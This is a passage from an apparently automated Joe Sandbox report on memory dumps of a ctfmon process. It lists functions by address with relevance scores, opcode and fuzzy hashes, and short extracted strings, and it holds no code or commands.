                                                              • Instruction ID: 66339051b1884c2ba3123d4e4bb3614b75dfbfe745e212ff0c03bff36b68a632
                                                              • Opcode Fuzzy Hash: 2d59f36901ba77a1d5173b1770939f6bebda0635c63cd8e0b3e37dab8a24d587
                                                              • Instruction Fuzzy Hash: 72E01230F0D61E46FBA491C4C8607E97354EF94301F1501B8D58EA33E1DDB8AFC68A45
                                                              Function 00007FFD9B750B9D Relevance: .0, Instructions: 14COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000021.00000002.2341554734.00007FFD9B750000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B750000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_33_2_7ffd9b750000_ctfmon.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: ba44e30b299232d18dd58396ab05012bbb058ffb7b5d4e444c28c93c79ff008a
                                                              • Instruction ID: 8435f43bf8c82b3960fdf7d0a1d94916be285f9f2fdc71ab2016f0957f02a39a
                                                              • Opcode Fuzzy Hash: ba44e30b299232d18dd58396ab05012bbb058ffb7b5d4e444c28c93c79ff008a
                                                              • Instruction Fuzzy Hash: 02C0123062990E8FEA40BB68C889824BBA0FB0E201BDA01E0E00CC71B1D669A8918700
                                                              Function 00007FFD9B7506AD Relevance: .0, Instructions: 13COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000021.00000002.2341554734.00007FFD9B750000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B750000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_33_2_7ffd9b750000_ctfmon.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: a8057b2a2e29e7e3848875d95335190a1301d675519968e9b42c91e4c58ee40f
                                                              • Instruction ID: 2e7e05e1aed059dd847c6845a192c75618af7a7d4008aa385411dedb55ec854d
                                                              • Opcode Fuzzy Hash: a8057b2a2e29e7e3848875d95335190a1301d675519968e9b42c91e4c58ee40f
                                                              • Instruction Fuzzy Hash: 0BC00205F5B75F01E47535EA54660BDB5409BC6A24FA21672D50D401B5988E22970196
                                                              Function 00007FFD9B7512B8 Relevance: .0, Instructions: 12COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000021.00000002.2341554734.00007FFD9B750000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B750000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_33_2_7ffd9b750000_ctfmon.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 3787d7a6cd85340d052397785a9d428e4e8ed80fe274377175b62aa4ea2664cd
                                                              • Instruction ID: 0e24c0ce0c2cf7ef61ac1638093a631dff263d19a768663cc0ed16db56227035
                                                              • Opcode Fuzzy Hash: 3787d7a6cd85340d052397785a9d428e4e8ed80fe274377175b62aa4ea2664cd
                                                              • Instruction Fuzzy Hash: CBC08C3061180C8FC908EB68C88480433A0FB09200BC200A0E00AC7170E259DCC1C740
                                                              Function 00007FFD9B7554F9 Relevance: .0, Instructions: 10COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000021.00000002.2341554734.00007FFD9B750000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B750000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_33_2_7ffd9b750000_ctfmon.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: b4eab3181d7244ab6c9c9b2b93a545fcdc1af92b2d7485cc521a53ab422429a1
                                                              • Instruction ID: 617c6cd81998f84257720132281748be1a24474730e2290284034bbe6f992331
                                                              • Opcode Fuzzy Hash: b4eab3181d7244ab6c9c9b2b93a545fcdc1af92b2d7485cc521a53ab422429a1
                                                              • Instruction Fuzzy Hash: CBC08C00F28C5E06F21A2B54043013D04428B80309F9940B0E40FC37DECC1D5F0252C6
                                                              Function 00007FFD9B7506D0 Relevance: .0, Instructions: 8COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000021.00000002.2341554734.00007FFD9B750000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B750000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_33_2_7ffd9b750000_ctfmon.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 807f6b4b69133c31bf548507f2ec2c4152f6a71d8028e8e319ca7a4a2011544e
                                                              • Instruction ID: 80ce5da35dcba426b19568190de0e1e445656f9c7f6918ec9fb611653b6a52c1
                                                              • Opcode Fuzzy Hash: 807f6b4b69133c31bf548507f2ec2c4152f6a71d8028e8e319ca7a4a2011544e
                                                              • Instruction Fuzzy Hash: 3DB01200D5B54F00E43435FB08520B474409F85104FD20270E40C402B598CD22960282

                                                              Non-executed Functions

                                                              Function 00007FFD9B7509B0 Relevance: 5.2, Strings: 4, Instructions: 195COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000021.00000002.2341554734.00007FFD9B750000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B750000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_33_2_7ffd9b750000_ctfmon.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: c9$!k9$"s9$#{9
                                                              • API String ID: 0-1692736845
                                                              • Opcode ID: f3b5fbc9f640bf4aaa97eece1622ed570faeb0355035ef5e2591a3bba84fd599
                                                              • Instruction ID: 010c9ac3abee5f39f79ae972777367cb855e11e54ea2807073247b8bcb68fc10
                                                              • Opcode Fuzzy Hash: f3b5fbc9f640bf4aaa97eece1622ed570faeb0355035ef5e2591a3bba84fd599
                                                              • Instruction Fuzzy Hash: CF51F31FB8D1264DE31932FD75618FD2B4A8FA5334B0847B7F05DC90DB8E08608686E5

                                                              Executed Functions

                                                              Function 00007FFD9B7B1175 Relevance: 1.6, Strings: 1, Instructions: 328COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000022.00000002.2322117292.00007FFD9B7B1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7B1000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_34_2_7ffd9b7b1000_ctfmon.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: I
                                                              • API String ID: 0-3707901625
                                                              • Opcode ID: e849ff0d3a50831adef3c945c90bc568ca2d574a2c926af7de37970d824936bb
                                                              • Instruction ID: 56f220bb77273c1cc00ac820fe0d5f12b3cf1df8ad819764d1f496ba3e6f9291
                                                              • Opcode Fuzzy Hash: e849ff0d3a50831adef3c945c90bc568ca2d574a2c926af7de37970d824936bb
                                                              • Instruction Fuzzy Hash: D681AF61F7E36A0BE33C49684CA20717795EBD2205B1A837DD8DBC35A7DC28AD074A81
                                                              Function 00007FFD9B780D48 Relevance: 1.5, Strings: 1, Instructions: 259COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000022.00000002.2322117292.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_34_2_7ffd9b780000_ctfmon.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 5Y_H
                                                              • API String ID: 0-3237497481
                                                              • Opcode ID: 409acce8df68df022cd30f23067731337dc5759177a864d1edbe13f76e74caf8
                                                              • Instruction ID: 3491bd3c23884cc31c2c376110d58f27f5c851fb73d73aefc5939075ac233739
                                                              • Opcode Fuzzy Hash: 409acce8df68df022cd30f23067731337dc5759177a864d1edbe13f76e74caf8
                                                              • Instruction Fuzzy Hash: D49106B5A1AA8D8FE759DF6888797AD7FE1FB56310F4002BBD04AC72E6DA781400C740
                                                              Function 00007FFD9B7B1141 Relevance: .5, Instructions: 459COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000022.00000002.2322117292.00007FFD9B7B1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7B1000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_34_2_7ffd9b7b1000_ctfmon.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 5e04eb9ea5a17209ac796a51f12421acc0fe9cb38371d6d057f157d7abf5605f
                                                              • Instruction ID: b5e399ea8b86868f26dbc24d3ed4f224b9e88762734ee1dc4f09151c6d251ce8
                                                              • Opcode Fuzzy Hash: 5e04eb9ea5a17209ac796a51f12421acc0fe9cb38371d6d057f157d7abf5605f
                                                              • Instruction Fuzzy Hash: AAC1B321B3E7AE0FE32D4A684C910B57791DF92305B1587BDD4DBC35B7D828A9074A81
                                                              Function 00007FFD9B780C25 Relevance: 1.3, Strings: 1, Instructions: 68COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000022.00000002.2322117292.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_34_2_7ffd9b780000_ctfmon.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: U
                                                              • API String ID: 0-3372436214
                                                              • Opcode ID: 277200e26e409dae68cdc82f55e0a1f068c4e42409205f337b3da2c35845ed17
                                                              • Instruction ID: 8a0abbc85fd62016e1e7d7a194364c0183c22cdbff141ad08c6d697179f6b4a2
                                                              • Opcode Fuzzy Hash: 277200e26e409dae68cdc82f55e0a1f068c4e42409205f337b3da2c35845ed17
                                                              • Instruction Fuzzy Hash: FC21D126A0DB8D8FE7129B6488611E87BA0EF42325F0542F7C0548B1E2D638260ACB91
                                                              Function 00007FFD9B780C38 Relevance: 1.3, Strings: 1, Instructions: 52COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000022.00000002.2322117292.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_34_2_7ffd9b780000_ctfmon.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: U
                                                              • API String ID: 0-3372436214
                                                              • Opcode ID: 520a81ca70cafffcc94859bf87e1673d9ed667531c068c5f64aed3fa6216f359
                                                              • Instruction ID: 90b8e4a0e07ed3ca5dac72c8e3e345520d6ed687c8cccce9a03c48bd16e0b895
                                                              • Opcode Fuzzy Hash: 520a81ca70cafffcc94859bf87e1673d9ed667531c068c5f64aed3fa6216f359
                                                              • Instruction Fuzzy Hash: BD11A025A0DB8D8FE702DB74C8602E87FA0EF42315F0646F7C084DB1E2DA3826098B91
                                                              Function 00007FFD9B780C40 Relevance: 1.3, Strings: 1, Instructions: 46COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000022.00000002.2322117292.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_34_2_7ffd9b780000_ctfmon.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: U
                                                              • API String ID: 0-3372436214
                                                              • Opcode ID: 61635438aed1f1c3a4a9c9fc20a10f855f5c4fae1573f7791d906154e79172b6
                                                              • Instruction ID: ab1fd3a35968fd68e9ccafc6205c14f021a5478a70445569ac0c8c460d8a6ed9
                                                              • Opcode Fuzzy Hash: 61635438aed1f1c3a4a9c9fc20a10f855f5c4fae1573f7791d906154e79172b6
                                                              • Instruction Fuzzy Hash: F801A135A09B8D8FE702DB74C8606D97FB0AF02315F0546F7C480DB1A6D6382648CB91
                                                              Function 00007FFD9B780C48 Relevance: 1.3, Strings: 1, Instructions: 40COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000022.00000002.2322117292.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_34_2_7ffd9b780000_ctfmon.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: U
                                                              • API String ID: 0-3372436214
                                                              • Opcode ID: d29e90e0689a99c8b78eedfe00202515bca0e764302219d4e39f5f2cf586c990
                                                              • Instruction ID: b0dceba582e9f25a0a82454677c46eeea92f871f24e0866e82e13419813222a9
                                                              • Opcode Fuzzy Hash: d29e90e0689a99c8b78eedfe00202515bca0e764302219d4e39f5f2cf586c990
                                                              • Instruction Fuzzy Hash: 7E01B135A0D7898FD702DB74C8506DD7FB0AF02315F0541E7D480DB2A6D6386648CB91
                                                              Function 00007FFD9B780C50 Relevance: 1.3, Strings: 1, Instructions: 35COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000022.00000002.2322117292.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_34_2_7ffd9b780000_ctfmon.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: U
                                                              • API String ID: 0-3372436214
                                                              • Opcode ID: bd8b6f51305df0b5143f89dee9c9b3da75dc93b31064bdf85609f089ae850942
                                                              • Instruction ID: f14c0fed0f9c0cd8875da9d223a1fdad7a7907e0214d60845dae78e53bd7e652
                                                              • Opcode Fuzzy Hash: bd8b6f51305df0b5143f89dee9c9b3da75dc93b31064bdf85609f089ae850942
                                                              • Instruction Fuzzy Hash: 1C01A234A0D7898FD702DB74C8A46DD7FF0AF02315F1542E7D480CB2A6DA386648C741
                                                              Function 00007FFD9B7B2FB9 Relevance: 1.3, Strings: 1, Instructions: 26COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000022.00000002.2322117292.00007FFD9B7B1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7B1000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_34_2_7ffd9b7b1000_ctfmon.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: M
                                                              • API String ID: 0-3664761504
                                                              • Opcode ID: 7acb123cf6e54beec420f03a74cc6ba43d72fffee62007052a022077cf2e4a12
                                                              • Instruction ID: dad6f3d2b9dccbbe685951510d99dd1b2bd225ac6b41aaa7595cc7f936403fdf
                                                              • Opcode Fuzzy Hash: 7acb123cf6e54beec420f03a74cc6ba43d72fffee62007052a022077cf2e4a12
                                                              • Instruction Fuzzy Hash: 81E06D7160F7C48FC71AAA748869454BFA0EF6720174A46EFC046CF1B7EA2D8889CB01
                                                              Function 00007FFD9B793BB9 Relevance: 1.3, Strings: 1, Instructions: 26COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000022.00000002.2322117292.00007FFD9B790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B790000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_34_2_7ffd9b790000_ctfmon.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: M
                                                              • API String ID: 0-3664761504
                                                              • Opcode ID: 4b43fc766ac1cd47a7da591cdf80477d690c9e3bc536900a59177af1b2b0693d
                                                              • Instruction ID: cfa55ed89338e8b9ba427b16bcc6a08c53cf1c6d28a8ff4a5c034aa663618a89
                                                              • Opcode Fuzzy Hash: 4b43fc766ac1cd47a7da591cdf80477d690c9e3bc536900a59177af1b2b0693d
                                                              • Instruction Fuzzy Hash: 41E06D2060E3C44FCB16AB7488684547F60EE6720174A42EFC086CF1A3EA2D8889C701
                                                              Function 00007FFD9B7BAB99 Relevance: 1.3, Strings: 1, Instructions: 25COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000022.00000002.2322117292.00007FFD9B7B1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7B1000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_34_2_7ffd9b7b1000_ctfmon.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: I
                                                              • API String ID: 0-3707901625
                                                              • Opcode ID: b47d6fe14c3174b3de2058bfa9f0386428db43f706162ab59f77e405e4e76ca9
                                                              • Instruction ID: b9871df1220c5717cfbd0dce8416a73a09bf9cdd13b41f769dc6ad9c0c2ad4dd
                                                              • Opcode Fuzzy Hash: b47d6fe14c3174b3de2058bfa9f0386428db43f706162ab59f77e405e4e76ca9
                                                              • Instruction Fuzzy Hash: A3E0ED6154F3D44FCB16AB7488698453F60EE6B21174B41DEC155CB1B3EA199949C701
                                                              Function 00007FFD9B7B1DD9 Relevance: 1.3, Strings: 1, Instructions: 22COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000022.00000002.2322117292.00007FFD9B7B1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7B1000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_34_2_7ffd9b7b1000_ctfmon.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: I
                                                              • API String ID: 0-3707901625
                                                              • Opcode ID: 4119c5da3a654fef30a86e11c17fa1e5eee9ce641b23e5be0e6f8b4f66b92db0
                                                              • Instruction ID: be9d14774810aa6bccb53f8b8f2aef84cbd445e0a43f8931e159da244751b328
                                                              • Opcode Fuzzy Hash: 4119c5da3a654fef30a86e11c17fa1e5eee9ce641b23e5be0e6f8b4f66b92db0
                                                              • Instruction Fuzzy Hash: ECE01A6054A3C04FCB0AEB7484698447F70AE6B21078B41DEC049CB1B3D62D8949C701
                                                              Function 00007FFD9B7B7089 Relevance: .5, Instructions: 497COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000022.00000002.2322117292.00007FFD9B7B1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7B1000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_34_2_7ffd9b7b1000_ctfmon.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: b6e9b062b809bcd373f3164e7254d76edad56c9533ff08d4d19a55d7b3067924
                                                              • Instruction ID: 18968e0c1a8c31391b8ce87d1fdc6234cfca07fc4b771535610fc600cb2d23bb
                                                              • Opcode Fuzzy Hash: b6e9b062b809bcd373f3164e7254d76edad56c9533ff08d4d19a55d7b3067924
                                                              • Instruction Fuzzy Hash: D0026A31A0D79D4FE7259B6888656A53BE1EF42310F0502FED44D8B1F3DA28AD46CF91
                                                              Function 00007FFD9B7B344D Relevance: .3, Instructions: 292COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000022.00000002.2322117292.00007FFD9B7B1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7B1000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_34_2_7ffd9b7b1000_ctfmon.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 3f4f7cdb9986be2c6c8d2d2b1f88a3c2bd85aef85648821ee94ac230009f639e
                                                              • Instruction ID: 31261c5eca36d5b311b493f8da86bb73fa778f3766ab094750b71d4c1d320c2b
                                                              • Opcode Fuzzy Hash: 3f4f7cdb9986be2c6c8d2d2b1f88a3c2bd85aef85648821ee94ac230009f639e
                                                              • Instruction Fuzzy Hash: 54910821B1DA5D0FEB9CEA68447667973C2EF94300F45427AD40EC72E7DD28BD858B90
                                                              Function 00007FFD9B7B2411 Relevance: .2, Instructions: 180COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000022.00000002.2322117292.00007FFD9B7B1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7B1000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_34_2_7ffd9b7b1000_ctfmon.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: fc89b2a18b32a3f1aa389b336244489d40b9b1c9ffab82583b84a38affaaee8e
                                                              • Instruction ID: a99b7475bdf1b0d78bae78759ea9cce6dc6660825576532314419b7ce79f230c
                                                              • Opcode Fuzzy Hash: fc89b2a18b32a3f1aa389b336244489d40b9b1c9ffab82583b84a38affaaee8e
                                                              • Instruction Fuzzy Hash: 2D510B31B0D75D4FDB68EB58D864AA977D2FB94310F0502BAD00DD72E2CE246D418F81
                                                              Function 00007FFD9B780945 Relevance: .2, Instructions: 154COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000022.00000002.2322117292.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_34_2_7ffd9b780000_ctfmon.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: cf94055f25c89cbf22be56ef6fb2a07fff3509c97e40e5239a55bba00ad853bf
                                                              • Instruction ID: e5cb615937688ad0b9fcfbfe5a384d5356d8417bfd627d28e2c45eeb832c2d6f
                                                              • Opcode Fuzzy Hash: cf94055f25c89cbf22be56ef6fb2a07fff3509c97e40e5239a55bba00ad853bf
                                                              • Instruction Fuzzy Hash: E341033270D9184FE728EAACF89A9F973D0EF4532170501BBE48AC7167DE11AC8287C5
                                                              Function 00007FFD9B780960 Relevance: .1, Instructions: 116COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000022.00000002.2322117292.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_34_2_7ffd9b780000_ctfmon.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 6c35decbc08cbc3cee93faa705afa38b7edc40213f59cf188a8239d96f805045
                                                              • Instruction ID: 90932cdc5a13501dab715adc5cce707e3616f360477ef0b61d20fdd1694b7f4c
                                                              • Opcode Fuzzy Hash: 6c35decbc08cbc3cee93faa705afa38b7edc40213f59cf188a8239d96f805045
                                                              • Instruction Fuzzy Hash: CF310C22B5DA1D0FE758F66C64AAAF877C2DF98321B5401BAF41EC32F7CD289C414284
                                                              Function 00007FFD9B78116D Relevance: .1, Instructions: 92COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000022.00000002.2322117292.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_34_2_7ffd9b780000_ctfmon.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: b7ff255d894394a58978ec39aaf285e6989d829c2f4a03ee469595d5ac7e01ec
                                                              • Instruction ID: 6524cb12264f7aa2b0f6e7b601e95707224923ae9ac279fbecec55937f1d368a
                                                              • Opcode Fuzzy Hash: b7ff255d894394a58978ec39aaf285e6989d829c2f4a03ee469595d5ac7e01ec
                                                              • Instruction Fuzzy Hash: AB31B631E09A4E8FDB45EB68C8A49AD7BF1FF5A311F0546BAC009D71B2DB38A541CB40
                                                              Function 00007FFD9B780998 Relevance: .1, Instructions: 91COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000022.00000002.2322117292.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_34_2_7ffd9b780000_ctfmon.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 49a80a9fdcd03099a241d80db679b71a00ddb82837dac37ade5eb12419e4448a
                                                              • Instruction ID: cf8ed2ec60b839351744efc3890032cdc56ef7e5107e4cea8f1e7a694e2c146b
                                                              • Opcode Fuzzy Hash: 49a80a9fdcd03099a241d80db679b71a00ddb82837dac37ade5eb12419e4448a
                                                              • Instruction Fuzzy Hash: 2921F920B19E1D0FE798F76C54AE67976C3EB9C312B5101B9E40EC32F6DD289C418281
                                                              Function 00007FFD9B7B6FE8 Relevance: .1, Instructions: 80COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000022.00000002.2322117292.00007FFD9B7B1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7B1000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_34_2_7ffd9b7b1000_ctfmon.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 0da6d733ff7097c16e130d48e07452425e900f5a3ac85459d8685ce0260feaa3
                                                              • Instruction ID: 905fe853454272e25f0d5d5a0c418f9fdb33f45c25f3cc13fe0950c524b69a0f
                                                              • Opcode Fuzzy Hash: 0da6d733ff7097c16e130d48e07452425e900f5a3ac85459d8685ce0260feaa3
                                                              • Instruction Fuzzy Hash: 2B112E2BF4C2610EE319B7BDB4764FD3790DF5113970842B7E19DC91E3ED19644A8A84
                                                              Function 00007FFD9B786CAB Relevance: .1, Instructions: 67COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000022.00000002.2322117292.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_34_2_7ffd9b780000_ctfmon.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 5a6607c0b624f76c502a7627b08efecc7c56037b1f7d040590a8890f31261492
                                                              • Instruction ID: 8037fad38bb2515d9e3fea65893ade6e566569afcdd801472dcf39d1b7b20d20
                                                              • Opcode Fuzzy Hash: 5a6607c0b624f76c502a7627b08efecc7c56037b1f7d040590a8890f31261492
                                                              • Instruction Fuzzy Hash: FF211F31E19E1D9FDBA5DB48C4A07E973E1FB58311F1102BAD40DD32B1DA75AA408B80
                                                              Function 00007FFD9B7941BB Relevance: .1, Instructions: 62COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000022.00000002.2322117292.00007FFD9B790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B790000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_34_2_7ffd9b790000_ctfmon.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 4b6c086a12b44d223cdf99953ddca188e9f0ea4cc2b1d7489cd5b64896abb684
                                                              • Instruction ID: 945b75517a02cd6e8f3255f3caba480c4998c57caa30c26182d8df0c5af9657a
                                                              • Opcode Fuzzy Hash: 4b6c086a12b44d223cdf99953ddca188e9f0ea4cc2b1d7489cd5b64896abb684
                                                              • Instruction Fuzzy Hash: 2D119D71F0861E8BEB24DF88D8686BD77B2FF44314F51033AD41A9B2A5DF782A018780
                                                              Function 00007FFD9B7BD675 Relevance: .0, Instructions: 49COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000022.00000002.2322117292.00007FFD9B7B1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7B1000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_34_2_7ffd9b7b1000_ctfmon.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 83219f9eb08833539ba2eeaad102a2e585418424b1152b8329b94597c77bebfa
                                                              • Instruction ID: 8ad9c47c7347c1bd45a87bb84af5f303b273e3f3db6f5b9025bfd76ffed5c607
                                                              • Opcode Fuzzy Hash: 83219f9eb08833539ba2eeaad102a2e585418424b1152b8329b94597c77bebfa
                                                              • Instruction Fuzzy Hash: 12019E31F0562E4BFB68D69894697F973E1EF84344F050279D40ED61E1DA28AE808F80
                                                              Function 00007FFD9B7BB23D Relevance: .0, Instructions: 47COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000022.00000002.2322117292.00007FFD9B7B1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7B1000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_34_2_7ffd9b7b1000_ctfmon.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: e4233d5116f3023a5cbcaad72285692031cc97edc8e70479d8cc548bf707d2ee
                                                              • Instruction ID: e4495bcb147973e78e46cbbd9060326d452dacd71d52afcb28b8c491dd5dfb51
